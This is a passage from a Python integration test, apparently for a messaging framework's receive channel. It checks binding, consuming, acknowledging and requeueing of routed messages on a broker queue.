                    count = m.rsplit(',', 1)[-1]
                    if m.startswith('5,'):
                        self.five_events.put(int(count))
                        newchan.ack(d)
                    elif m.startswith('3,'):
                        self.three_events.put(int(count))
                        newchan.ack(d)
                    else:
                        raise StandardError("unknown message: %s" % m)

                except ChannelClosedError:
                    break

        lch = self.container.node.channel(SubscriberChannel)
        gl_listen = spawn(listen, lch)

        def do_cleanups(gl_e5, gl_e3, gl_l, lch):
            self.publish_five.set()
            self.publish_three.set()
            gl_e5.join(timeout=5)
            gl_e3.join(timeout=5)

            lch.stop_consume()
            lch._destroy_queue()
            lch.close()
            gl_listen.join(timeout=5)

        self.addCleanup(do_cleanups, gl_every_five, gl_every_three, gl_listen, lch)

        ch = self.container.node.channel(RecvChannel)
        ch._recv_name = NameTrio(bootstrap.get_sys_name(), 'test_queue')
        ch._queue_auto_delete = False

        # #########
        # THIS TEST EXPECTS OLD BEHAVIOR OF NO QOS, SO SET A HIGH BAR
        # #########
        ch._transport.qos_impl(prefetch_count=9999)

        def cleanup_channel(thech):
            thech._destroy_queue()
            thech.close()

        self.addCleanup(cleanup_channel, ch)

        # declare exchange and queue, no binding yet
        ch._declare_exchange(ch._recv_name.exchange)
        ch._declare_queue(ch._recv_name.queue)
        ch._purge()

        # do binding to 5 pub only
        ch._bind('routed.5')

        # wait for one message
        self.five_events.get(timeout=10)

        # ensure 1 message, 0 consumer
        self.assertTupleEqual((1, 0), ch.get_stats())

        # start a consumer
        ch.start_consume()
        time.sleep(0.1)
        self.assertEquals(ch._recv_queue.qsize(), 1)       # should have been delivered to the channel, waiting for us now

        # receive one message with instant timeout
        m, h, d = ch.recv(timeout=0)
        self.assertEquals(m, "5,0")
        ch.ack(d)

        # we have no more messages, should instantly fail
        self.assertRaises(PQueue.Empty, ch.recv, timeout=0)

        # stop consumer
        ch.stop_consume()

        # wait until next 5 publish event
        self.five_events.get(timeout=10)

        # start consumer again, empty queue
        ch.start_consume()
        time.sleep(0.1)
        while True:
            try:
                m, h, d = ch.recv(timeout=0)
                self.assertTrue(m.startswith('5,'))
                ch.ack(d)
            except PQueue.Empty:
                ch.stop_consume()
                break

        # wait for new message
        self.five_events.get(timeout=10)

        # consume and requeue
        ch.start_consume()
        time.sleep(0.1)
        m, h, d = ch.recv(timeout=0)
        self.assertTrue(m.startswith('5,'))
        ch.reject(d, requeue=True)

        # rabbit appears to deliver this later on, only when we've got another message in it
        # wait for another message publish
        num = self.five_events.get(timeout=10)
        self.assertEquals(num, 3)
        time.sleep(0.1)

        expect = ["5,2", "5,3"]
        while True:
            try:
                m, h, d = ch.recv(timeout=0)
                self.assertTrue(m.startswith('5,'))
                self.assertEquals(m, expect.pop(0))

                ch.ack(d)
            except PQueue.Empty:
                ch.stop_consume()
                self.assertListEqual(expect, [])
                break

        # let's change the binding to the 3 now, empty the testqueue first (artifact of test)
        while not self.three_events.empty():
            self.three_events.get(timeout=0)

        # we have to keep the exchange around - it will likely autodelete.
        ch2 = self.container.node.channel(RecvChannel)
        ch2.setup_listener(NameTrio(bootstrap.get_sys_name(), "another_queue"))

        ch._destroy_binding()
        ch._bind('routed.3')

        ch2._destroy_queue()
        ch2.close()

        self.three_events.get(timeout=10)
        ch.start_consume()
        time.sleep(0.1)
        self.assertEquals(ch._recv_queue.qsize(), 1)

        m, h, d = ch.recv(timeout=0)
        self.assertTrue(m.startswith('3,'))
        ch.ack(d)

        # wait for a new 3 to reject
        self.three_events.get(timeout=10)
        time.sleep(0.1)

        m, h, d = ch.recv(timeout=0)
        ch.reject(d, requeue=True)

        # recycle consumption, should get the requeued message right away?
        ch.stop_consume()
        ch.start_consume()
        time.sleep(0.1)

        self.assertEquals(ch._recv_queue.qsize(), 1)

        m2, h2, d2 = ch.recv(timeout=0)
        self.assertEquals(m, m2)

        ch.stop_consume()